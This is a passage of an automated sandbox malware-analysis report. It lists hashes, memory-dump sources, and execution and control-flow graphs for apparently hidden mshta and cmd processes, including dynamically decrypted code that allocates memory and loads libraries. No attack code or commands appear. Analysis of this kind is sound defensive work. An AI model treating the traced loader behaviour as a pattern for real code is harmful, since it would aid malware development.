                                                                                                            • Opcode ID: 286b6d01e01d60a9c7311f258349b816b5eba68e569a770be06b8a5557e1329f
                                                                                                            • Instruction ID: 16cef19a75897a972722d17d6cca093052f09fdebf5c941e974c304b5546d580
                                                                                                            • Opcode Fuzzy Hash: 286b6d01e01d60a9c7311f258349b816b5eba68e569a770be06b8a5557e1329f
                                                                                                            • Instruction Fuzzy Hash: 0E219232706B8089EB118F5EE40429AB7A1FB89BD6F048015DE8D57B25EF78C4829780
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1617791916-0
                                                                                                            • Opcode ID: d4b3fcfbe4be7c36cb8b6f9944163e5fe9bb7a40ebadcfb6d552ceb49718e017
                                                                                                            • Instruction ID: 9b446fd1866a1343f7f87fa1f1a8520396ec9a9a932a91b1f8be0d0211b8919e
                                                                                                            • Opcode Fuzzy Hash: d4b3fcfbe4be7c36cb8b6f9944163e5fe9bb7a40ebadcfb6d552ceb49718e017
                                                                                                            • Instruction Fuzzy Hash: 28E06D727026049AF7058F66D8043993AE1FB8AF03F48C02CC90D0B350EF7D84D98781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:3.2%
                                                                                                            Dynamic/Decrypted Code Coverage:45.8%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:96
                                                                                                            Total number of Limit Nodes:14
                                                                                                            execution_graph 31194 2155a5bb900 31199 2155a5bb911 _set_errno_from_matherr 31194->31199 31195 2155a5bb962 31200 2155a5bb8e0 5 API calls _set_errno_from_matherr 31195->31200 31196 2155a5bb946 HeapAlloc 31197 2155a5bb960 31196->31197 31196->31199 31199->31195 31199->31196 31200->31197 31201 2155a5829a0 31202 2155a5829ce 31201->31202 31203 2155a582a2c VirtualAlloc 31202->31203 31206 2155a582b3f 31202->31206 31205 2155a582a50 31203->31205 31203->31206 31204 2155a582ac3 LoadLibraryA 31204->31205 31205->31204 31205->31206 31207 7ff7137f8d80 31208 7ff7137f8da4 31207->31208 31209 7ff7137f8db6 31208->31209 31210 7ff7137f8dbf Sleep 31208->31210 31211 7ff7137f8ddb _amsg_exit 31209->31211 31212 7ff7137f8de7 31209->31212 31210->31208 31211->31212 31213 7ff7137f8e56 _initterm 31212->31213 31214 7ff7137f8e3c 31212->31214 31215 7ff7137f8e73 _IsNonwritableInCurrentImage 31212->31215 31213->31215 31221 7ff7137f37d8 GetCurrentThreadId OpenThread 31215->31221 31254 7ff7137f04f4 31221->31254 31223 7ff7137f3839 HeapSetInformation RegOpenKeyExW 31224 7ff7137f388d 31223->31224 31225 7ff7137fe9f8 RegQueryValueExW RegCloseKey 31223->31225 31226 7ff7137f5920 VirtualQuery VirtualQuery 31224->31226 31228 7ff7137fea41 GetThreadLocale 31225->31228 31227 7ff7137f38ab GetConsoleOutputCP GetCPInfo 31226->31227 31227->31228 31229 7ff7137f38f1 memset 31227->31229 31230 7ff7137f3919 31228->31230 31229->31230 31230->31225 31231 7ff7137f4d5c 391 API calls 31230->31231 31232 7ff7137e3240 166 API calls 31230->31232 31233 7ff7137feb27 _setjmp 31230->31233 31234 7ff7137f3948 _setjmp 31230->31234 31235 7ff7137f01b8 6 API calls 31230->31235 31236 7ff7137f4c1c 166 API calls 31230->31236 31237 7ff7137feb71 _setmode 31230->31237 31238 7ff713808530 370 API calls 31230->31238 31239 7ff7137edf60 481 API calls 31230->31239 31240 7ff7137f86f0 182 API calls 31230->31240 31241 7ff7137f0580 12 API calls 31230->31241 31243 7ff7137f58e4 EnterCriticalSection LeaveCriticalSection 31230->31243 31245 7ff7137ebe00 647 API calls 31230->31245 31246 7ff7137f58e4 EnterCriticalSection LeaveCriticalSection 31230->31246 31231->31230 31232->31230 31233->31230 31234->31230 31235->31230 31236->31230 31237->31230 31238->31230 31239->31230 31240->31230 31242 7ff7137f398b GetConsoleOutputCP GetCPInfo 31241->31242 31244 7ff7137f04f4 GetModuleHandleW GetProcAddress SetThreadLocale 31242->31244 31243->31230 31244->31230 31245->31230 31247 7ff7137febbe GetConsoleOutputCP GetCPInfo 31246->31247 31248 7ff7137f04f4 GetModuleHandleW GetProcAddress SetThreadLocale 31247->31248 31249 7ff7137febe6 31248->31249 31250 7ff7137ebe00 647 API calls 31249->31250 31251 7ff7137f0580 12 API calls 31249->31251 31250->31249 31252 7ff7137febfc GetConsoleOutputCP GetCPInfo 31251->31252 31253 7ff7137f04f4 GetModuleHandleW GetProcAddress SetThreadLocale 31252->31253 31253->31230 31255 7ff7137f0504 31254->31255 31256 7ff7137f051e GetModuleHandleW 31255->31256 31257 7ff7137f054d GetProcAddress 31255->31257 31258 7ff7137f056c SetThreadLocale 31255->31258 31256->31255 31257->31255 31260 2155a5ba608 31261 2155a5ba621 31260->31261 31270 2155a5ba61d 31260->31270 31272 2155a5bccd8 17 API calls 31261->31272 31263 2155a5ba626 31273 2155a5bd1d0 GetEnvironmentStringsW 31263->31273 31266 2155a5ba633 31269 2155a5bb978 __free_lconv_mon 5 API calls 31266->31269 31268 2155a5ba640 31286 2155a5bb978 31268->31286 31269->31270 31272->31263 31277 2155a5bd1fe 31273->31277 31284 2155a5bd2a0 31273->31284 31274 2155a5ba62b 31274->31266 31285 2155a5ba674 7 API calls 4 library calls 31274->31285 31275 2155a5bd2aa FreeEnvironmentStringsW 31275->31274 31291 2155a5bd120 WideCharToMultiByte 31277->31291 31278 2155a5bd250 31279 2155a5baeac 6 API calls 31278->31279 31278->31284 31280 2155a5bd25f 31279->31280 31281 2155a5bd289 31280->31281 31282 2155a5bd120 WideCharToMultiByte 31280->31282 31283 2155a5bb978 __free_lconv_mon 5 API calls 31281->31283 31282->31281 31283->31284 31284->31274 31284->31275 31285->31268 31287 2155a5bb97d HeapFree 31286->31287 31288 2155a5bb9af 31286->31288 31287->31288 31289 2155a5bb998 31287->31289 31288->31266 31292 2155a5bb8e0 5 API calls _set_errno_from_matherr 31289->31292 31292->31288 31293 2155a5bdb28 31294 2155a5bdb38 31293->31294 31301 2155a5bfc4c 8 API calls 2 library calls 31294->31301 31296 2155a5bdb41 31297 2155a5bdb4f 31296->31297 31302 2155a5bd92c 10 API calls 31296->31302 31299 2155a5bdb4a 31303 2155a5bda1c 31299->31303 31301->31296 31302->31299 31305 2155a5bda3a 31303->31305 31304 2155a5bdb0d 31304->31297 31305->31304 31306 2155a5bda95 GetStdHandle 31305->31306 31306->31305 31307 2155a5bdaa8 GetFileType 31306->31307 31307->31305
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                                                            • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                                                            • API String ID: 3305344409-4288247545
                                                                                                            • Opcode ID: 24339b1bae00977a6506967ece6ae207caf9a892aecb19933cb35f9f7a921b2b
                                                                                                            • Instruction ID: 7a69f4c664ca89d52866e19e0e15265f70ebe1e20738c96192914093129166a7
                                                                                                            • Opcode Fuzzy Hash: 24339b1bae00977a6506967ece6ae207caf9a892aecb19933cb35f9f7a921b2b
                                                                                                            • Instruction Fuzzy Hash: C042A621A09E8285EB90BB15A8902B9E7A4FF4D7B4FC44234D92E677D4DF3DE54D8320
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 216 7ff7137eaa54-7ff7137eaa98 call 7ff7137ecd90 219 7ff7137eaa9e 216->219 220 7ff7137fbf5a-7ff7137fbf70 call 7ff7137f4c1c call 7ff7137eff70 216->220 221 7ff7137eaaa5-7ff7137eaaa8 219->221 223 7ff7137eacde-7ff7137ead00 221->223 224 7ff7137eaaae-7ff7137eaac8 wcschr 221->224 229 7ff7137ead06 223->229 224->223 226 7ff7137eaace-7ff7137eaae9 towlower 224->226 226->223 228 7ff7137eaaef-7ff7137eaaf3 226->228 231 7ff7137eaaf9-7ff7137eaafd 228->231 232 7ff7137fbeb7-7ff7137fbec4 call 7ff71380eaf0 228->232 233 7ff7137ead0d-7ff7137ead1f 229->233 236 7ff7137eab03-7ff7137eab07 231->236 237 7ff7137fbbcf 231->237 243 7ff7137fbec6-7ff7137fbed8 call 7ff7137e3240 232->243 244 7ff7137fbf43-7ff7137fbf59 call 7ff7137f4c1c 232->244 238 7ff7137ead22-7ff7137ead2a call 7ff7137f13e0 233->238 240 7ff7137eab7d-7ff7137eab81 236->240 241 7ff7137eab09-7ff7137eab0d 236->241 245 7ff7137fbbde 237->245 238->221 246 7ff7137fbe63 240->246 247 7ff7137eab87-7ff7137eab95 240->247 241->246 248 7ff7137eab13-7ff7137eab17 241->248 243->244 262 7ff7137fbeda-7ff7137fbee9 call 7ff7137e3240 243->262 244->220 257 7ff7137fbbea-7ff7137fbbec 245->257 254 7ff7137fbe72-7ff7137fbe88 call 7ff7137e3278 call 7ff7137f4c1c 246->254 252 7ff7137eab98-7ff7137eaba0 247->252 248->240 253 7ff7137eab19-7ff7137eab1d 248->253 252->252 258 7ff7137eaba2-7ff7137eabb3 call 7ff7137ecd90 252->258 253->245 259 7ff7137eab23-7ff7137eab27 253->259 281 7ff7137fbe89-7ff7137fbe8c 254->281 267 7ff7137fbbf8-7ff7137fbc01 257->267 258->220 272 7ff7137eabb9-7ff7137eabde call 7ff7137f13e0 call 7ff7137f33a8 258->272 259->257 260 7ff7137eab2d-7ff7137eab31 259->260 260->229 264 7ff7137eab37-7ff7137eab3b 260->264 276 7ff7137fbef3-7ff7137fbef9 262->276 277 7ff7137fbeeb-7ff7137fbef1 262->277 264->267 269 7ff7137eab41-7ff7137eab45 264->269 267->233 273 7ff7137fbc06-7ff7137fbc2a call 7ff7137f13e0 269->273 274 7ff7137eab4b-7ff7137eab4f 269->274 306 7ff7137eac75 272->306 307 7ff7137eabe4-7ff7137eabe7 272->307 293 7ff7137fbc2c-7ff7137fbc4c _wcsnicmp 273->293 294 7ff7137fbc5a-7ff7137fbc61 273->294 279 7ff7137eab55-7ff7137eab78 call 7ff7137f13e0 274->279 280 7ff7137ead2f-7ff7137ead33 274->280 276->244 282 7ff7137fbefb-7ff7137fbf0d call 7ff7137e3240 276->282 277->244 277->276 279->221 285 7ff7137fbc66-7ff7137fbc8a call 7ff7137f13e0 280->285 286 7ff7137ead39-7ff7137ead3d 280->286 289 7ff7137fbe92-7ff7137fbeaa call 7ff7137e3278 call 7ff7137f4c1c 281->289 290 7ff7137eacbe 281->290 282->244 313 7ff7137fbf0f-7ff7137fbf21 call 7ff7137e3240 282->313 319 7ff7137fbcc4-7ff7137fbcdc 285->319 320 7ff7137fbc8c-7ff7137fbcaa _wcsnicmp 285->320 295 7ff7137ead43-7ff7137ead49 286->295 296 7ff7137fbcde-7ff7137fbd02 call 7ff7137f13e0 286->296 342 7ff7137fbeab-7ff7137fbeb6 call 7ff7137f4c1c 289->342 300 7ff7137eacc0-7ff7137eacc7 290->300 293->294 303 7ff7137fbc4e-7ff7137fbc55 293->303 308 7ff7137fbd31-7ff7137fbd4f _wcsnicmp 294->308 304 7ff7137ead4f-7ff7137ead68 295->304 305 7ff7137fbd5e-7ff7137fbd65 295->305 335 7ff7137fbd04-7ff7137fbd24 _wcsnicmp 296->335 336 7ff7137fbd2a 296->336 300->300 310 7ff7137eacc9-7ff7137eacda 300->310 314 7ff7137fbbb3-7ff7137fbbb7 303->314 316 7ff7137ead6d-7ff7137ead70 304->316 317 7ff7137ead6a 304->317 305->304 315 7ff7137fbd6b-7ff7137fbd73 305->315 323 7ff7137eac77-7ff7137eac7f 306->323 307->290 318 7ff7137eabed-7ff7137eac0b call 7ff7137ecd90 * 2 307->318 325 7ff7137fbd55 308->325 326 7ff7137fbbc2-7ff7137fbbca 308->326 310->223 313->244 338 7ff7137fbf23-7ff7137fbf35 call 7ff7137e3240 313->338 327 7ff7137fbbba-7ff7137fbbbd call 7ff7137f13e0 314->327 328 7ff7137fbe4a-7ff7137fbe5e 315->328 329 7ff7137fbd79-7ff7137fbd8b iswxdigit 315->329 316->238 317->316 318->342 356 7ff7137eac11-7ff7137eac14 318->356 319->308 320->319 333 7ff7137fbcac-7ff7137fbcbf 320->333 323->290 331 7ff7137eac81-7ff7137eac85 323->331 325->305 326->221 327->326 328->327 329->328 340 7ff7137fbd91-7ff7137fbda3 iswxdigit 329->340 337 7ff7137eac88-7ff7137eac8f 331->337 333->314 335->336 343 7ff7137fbbac 335->343 336->308 337->337 346 7ff7137eac91-7ff7137eac94 337->346 338->244 358 7ff7137fbf37-7ff7137fbf3e call 7ff7137e3240 338->358 340->328 344 7ff7137fbda9-7ff7137fbdbb iswxdigit 340->344 342->232 343->314 344->328 351 7ff7137fbdc1-7ff7137fbdd7 iswdigit 344->351 346->290 349 7ff7137eac96-7ff7137eacaa wcsrchr 346->349 349->290 357 7ff7137eacac-7ff7137eacb9 call 7ff7137f1300 349->357 354 7ff7137fbddf-7ff7137fbdeb towlower 351->354 355 7ff7137fbdd9-7ff7137fbddd 351->355 361 7ff7137fbdee-7ff7137fbe0f iswdigit 354->361 355->361 356->342 362 7ff7137eac1a-7ff7137eac33 memset 356->362 357->290 358->244 363 7ff7137fbe11-7ff7137fbe15 361->363 364 7ff7137fbe17-7ff7137fbe23 towlower 361->364 362->306 365 7ff7137eac35-7ff7137eac4b wcschr 362->365 366 7ff7137fbe26-7ff7137fbe45 call 7ff7137f13e0 363->366 364->366 365->306 367 7ff7137eac4d-7ff7137eac54 365->367 366->328 368 7ff7137ead72-7ff7137ead91 wcschr 367->368 369 7ff7137eac5a-7ff7137eac6f wcschr 367->369 371 7ff7137eaf03-7ff7137eaf07 368->371 372 7ff7137ead97-7ff7137eadac wcschr 368->372 369->306 369->368 371->306 372->371 373 7ff7137eadb2-7ff7137eadc7 wcschr 372->373 373->371 374 7ff7137eadcd-7ff7137eade2 wcschr 373->374 374->371 375 7ff7137eade8-7ff7137eadfd wcschr 374->375 375->371 376 7ff7137eae03-7ff7137eae18 wcschr 375->376 376->371 377 7ff7137eae1e-7ff7137eae21 376->377 378 7ff7137eae24-7ff7137eae27 377->378 378->371 379 7ff7137eae2d-7ff7137eae40 iswspace 378->379 380 7ff7137eae42-7ff7137eae49 379->380 381 7ff7137eae4b-7ff7137eae5e 379->381 380->378 382 7ff7137eae66-7ff7137eae6d 381->382 382->382 383 7ff7137eae6f-7ff7137eae77 382->383 383->254 384 7ff7137eae7d-7ff7137eae97 call 7ff7137f13e0 383->384 387 7ff7137eae9a-7ff7137eaea4 384->387 388 7ff7137eaea6-7ff7137eaead 387->388 389 7ff7137eaebc-7ff7137eaef8 call 7ff7137f0a6c call 7ff7137eff70 * 2 387->389 388->389 390 7ff7137eaeaf-7ff7137eaeba 388->390 389->323 397 7ff7137eaefe 389->397 390->387 390->389 397->281
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcschr$Heap$AllocateProcessiswspacememsettowlowerwcsrchr
                                                                                                            • String ID: :$:$:$:ON$OFF
                                                                                                            • API String ID: 4076514806-467788257
                                                                                                            • Opcode ID: a729f565638991cd54cf916fc6f5128fd08837229019dbdabd8178241c992b90
                                                                                                            • Instruction ID: 315560bd00ae74524552954ef10515e2b587430dc94a303fb58df3e7541079c0
                                                                                                            • Opcode Fuzzy Hash: a729f565638991cd54cf916fc6f5128fd08837229019dbdabd8178241c992b90
                                                                                                            • Instruction Fuzzy Hash: 4522AE21A08A4286FBE4BB259494279E695FF4DBA0FC88135D91E77394DF7DA84CC330
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 398 7ff7137f51ec-7ff7137f5248 call 7ff7137f5508 GetLocaleInfoW 401 7ff7137fef32-7ff7137fef3c 398->401 402 7ff7137f524e-7ff7137f5272 GetLocaleInfoW 398->402 403 7ff7137fef3f-7ff7137fef49 401->403 404 7ff7137f5295-7ff7137f52b9 GetLocaleInfoW 402->404 405 7ff7137f5274-7ff7137f527a 402->405 410 7ff7137fef61-7ff7137fef6c 403->410 411 7ff7137fef4b-7ff7137fef52 403->411 408 7ff7137f52de-7ff7137f5305 GetLocaleInfoW 404->408 409 7ff7137f52bb-7ff7137f52c3 404->409 406 7ff7137f5280-7ff7137f5286 405->406 407 7ff7137f54f7-7ff7137f54f9 405->407 406->407 412 7ff7137f528c-7ff7137f528f 406->412 407->401 415 7ff7137f5321-7ff7137f5343 GetLocaleInfoW 408->415 416 7ff7137f5307-7ff7137f531b 408->416 413 7ff7137fef75-7ff7137fef78 409->413 414 7ff7137f52c9-7ff7137f52d7 409->414 410->413 411->410 417 7ff7137fef54-7ff7137fef5f 411->417 412->404 420 7ff7137fef7a-7ff7137fef7d 413->420 421 7ff7137fef99-7ff7137fefa3 413->421 414->408 418 7ff7137fefaf-7ff7137fefb9 415->418 419 7ff7137f5349-7ff7137f536e GetLocaleInfoW 415->419 416->415 417->403 417->410 422 7ff7137fefbc-7ff7137fefc6 418->422 423 7ff7137f5374-7ff7137f5396 GetLocaleInfoW 419->423 424 7ff7137feff2-7ff7137feffc 419->424 420->408 425 7ff7137fef83-7ff7137fef8d 420->425 421->418 426 7ff7137fefde-7ff7137fefe9 422->426 427 7ff7137fefc8-7ff7137fefcf 422->427 429 7ff7137ff035-7ff7137ff03f 423->429 430 7ff7137f539c-7ff7137f53be GetLocaleInfoW 423->430 428 7ff7137fefff-7ff7137ff009 424->428 425->421 426->424 427->426 431 7ff7137fefd1-7ff7137fefdc 427->431 432 7ff7137ff021-7ff7137ff02c 428->432 433 7ff7137ff00b-7ff7137ff012 428->433 436 7ff7137ff042-7ff7137ff04c 429->436 434 7ff7137f53c4-7ff7137f53e6 GetLocaleInfoW 430->434 435 7ff7137ff078-7ff7137ff082 430->435 431->422 431->426 432->429 433->432 440 7ff7137ff014-7ff7137ff01f 433->440 441 7ff7137ff0bb-7ff7137ff0c5 434->441 442 7ff7137f53ec-7ff7137f540e GetLocaleInfoW 434->442 439 7ff7137ff085-7ff7137ff08f 435->439 437 7ff7137ff064-7ff7137ff06f 436->437 438 7ff7137ff04e-7ff7137ff055 436->438 437->435 438->437 443 7ff7137ff057-7ff7137ff062 438->443 444 7ff7137ff091-7ff7137ff098 439->444 445 7ff7137ff0a7-7ff7137ff0b2 439->445 440->428 440->432 446 7ff7137ff0c8-7ff7137ff0d2 441->446 447 7ff7137f5414-7ff7137f5436 GetLocaleInfoW 442->447 448 7ff7137ff0fe-7ff7137ff108 442->448 443->436 443->437 444->445 450 7ff7137ff09a-7ff7137ff0a5 444->450 445->441 451 7ff7137ff0d4-7ff7137ff0db 446->451 452 7ff7137ff0ea-7ff7137ff0f5 446->452 453 7ff7137ff141-7ff7137ff14b 447->453 454 7ff7137f543c-7ff7137f545e GetLocaleInfoW 447->454 449 7ff7137ff10b-7ff7137ff115 448->449 455 7ff7137ff12d-7ff7137ff138 449->455 456 7ff7137ff117-7ff7137ff11e 449->456 450->439 450->445 451->452 458 7ff7137ff0dd-7ff7137ff0e8 451->458 452->448 457 7ff7137ff14e-7ff7137ff158 453->457 459 7ff7137ff184-7ff7137ff18b 454->459 460 7ff7137f5464-7ff7137f5486 GetLocaleInfoW 454->460 455->453 456->455 463 7ff7137ff120-7ff7137ff12b 456->463 464 7ff7137ff170-7ff7137ff17b 457->464 465 7ff7137ff15a-7ff7137ff161 457->465 458->446 458->452 466 7ff7137ff18e-7ff7137ff198 459->466 461 7ff7137ff1c4-7ff7137ff1ce 460->461 462 7ff7137f548c-7ff7137f54ae GetLocaleInfoW 460->462 469 7ff7137ff1d1-7ff7137ff1db 461->469 467 7ff7137f54b4-7ff7137f54f5 setlocale call 7ff7137f8f80 462->467 468 7ff7137ff207-7ff7137ff20e 462->468 463->449 463->455 464->459 465->464 470 7ff7137ff163-7ff7137ff16e 465->470 471 7ff7137ff1b0-7ff7137ff1bb 466->471 472 7ff7137ff19a-7ff7137ff1a1 466->472 476 7ff7137ff211-7ff7137ff21b 468->476 474 7ff7137ff1f3-7ff7137ff1fe 469->474 475 7ff7137ff1dd-7ff7137ff1e4 469->475 470->457 470->464 471->461 472->471 477 7ff7137ff1a3-7ff7137ff1ae 472->477 474->468 475->474 479 7ff7137ff1e6-7ff7137ff1f1 475->479 480 7ff7137ff233-7ff7137ff23e 476->480 481 7ff7137ff21d-7ff7137ff224 476->481 477->466 477->471 479->469 479->474 481->480 482 7ff7137ff226-7ff7137ff231 481->482 482->476 482->480
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale$DefaultLangUsersetlocale
                                                                                                            • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                            • API String ID: 2492766124-2236139042
                                                                                                            • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                            • Instruction ID: 53840515e09884be2b56b16b235a767172716bb8ffffbcf102adacff88670abb
                                                                                                            • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                            • Instruction Fuzzy Hash: A6F16E61B08B46C6EF91AF15D5802B9A2A8BF08BA0FD44135CA2D67794EF3DE51DC370
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 483 7ff7137f4224-7ff7137f42a5 InitializeProcThreadAttributeList 484 7ff7137fecd4-7ff7137fecee GetLastError call 7ff713809eec 483->484 485 7ff7137f42ab-7ff7137f42e5 UpdateProcThreadAttribute 483->485 494 7ff7137fed1e 484->494 486 7ff7137fecf0-7ff7137fed19 GetLastError call 7ff713809eec DeleteProcThreadAttributeList 485->486 487 7ff7137f42eb-7ff7137f43c6 memset * 2 GetStartupInfoW call 7ff7137f3a90 call 7ff7137eb900 485->487 486->494 497 7ff7137f43cc-7ff7137f43d3 487->497 498 7ff7137f4638-7ff7137f4644 _local_unwind 487->498 499 7ff7137f4649-7ff7137f4650 497->499 500 7ff7137f43d9-7ff7137f43dc 497->500 498->499 499->500 503 7ff7137f4656-7ff7137f465d 499->503 501 7ff7137f4415-7ff7137f4424 call 7ff7137f5a68 500->501 502 7ff7137f43de-7ff7137f43f5 wcsrchr 500->502 510 7ff7137f4589-7ff7137f4590 501->510 511 7ff7137f442a-7ff7137f4486 CreateProcessW 501->511 502->501 504 7ff7137f43f7-7ff7137f440f lstrcmpW 502->504 503->501 506 7ff7137f4663 503->506 504->501 507 7ff7137f4668-7ff7137f466d call 7ff713809044 504->507 506->500 507->501 510->511 514 7ff7137f4596-7ff7137f45fa CreateProcessAsUserW 510->514 513 7ff7137f448b-7ff7137f448f 511->513 515 7ff7137f4495-7ff7137f44c0 CloseHandle call 7ff7137f498c 513->515 516 7ff7137f4672-7ff7137f4682 GetLastError 513->516 514->513 518 7ff7137f44c5-7ff7137f44c7 515->518 519 7ff7137f468d-7ff7137f4694 516->519 518->519 520 7ff7137f44cd-7ff7137f44e5 518->520 521 7ff7137f4696-7ff7137f46a0 519->521 522 7ff7137f46a2-7ff7137f46ac 519->522 523 7ff7137f47a3-7ff7137f47a9 520->523 524 7ff7137f44eb-7ff7137f44f2 520->524 521->522 525 7ff7137f46ae-7ff7137f46b5 call 7ff7137f97bc 521->525 522->525 526 7ff7137f4705-7ff7137f4707 522->526 527 7ff7137f45ff-7ff7137f4607 524->527 528 7ff7137f44f8-7ff7137f4507 524->528 541 7ff7137f4703 525->541 542 7ff7137f46b7-7ff7137f4701 525->542 526->520 530 7ff7137f470d-7ff7137f472a call 7ff7137ecd90 526->530 527->528 531 7ff7137f460d 527->531 532 7ff7137f4612-7ff7137f4616 528->532 533 7ff7137f450d-7ff7137f455e call 7ff7137f5cb4 call 7ff7137f33f0 call 7ff7137f498c 528->533 543 7ff7137f473d-7ff7137f4767 call 7ff7137f13e0 call 7ff713809eec call 7ff7137eff70 _local_unwind 530->543 544 7ff7137f472c-7ff7137f4738 _local_unwind 530->544 537 7ff7137f476c-7ff7137f4773 531->537 539 7ff7137f461c-7ff7137f4633 532->539 540 7ff7137f47d7-7ff7137f47df 532->540 567 7ff7137f4564-7ff7137f4579 call 7ff7137f498c 533->567 568 7ff7137f47ae-7ff7137f47ca call 7ff7137f33f0 533->568 537->528 548 7ff7137f4779-7ff7137f4780 537->548 546 7ff7137f47f2-7ff7137f483c call 7ff7137eff70 DeleteProcThreadAttributeList call 7ff7137f8f80 539->546 545 7ff7137f47e1-7ff7137f47ed CloseHandle 540->545 540->546 541->526 542->526 543->537 544->543 545->546 548->528 552 7ff7137f4786-7ff7137f4789 548->552 552->528 557 7ff7137f478f-7ff7137f4792 552->557 557->523 561 7ff7137f4794-7ff7137f479d call 7ff71380a250 557->561 561->523 561->528 567->546 575 7ff7137f457f-7ff7137f4584 call 7ff71380a920 567->575 568->540 575->546
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
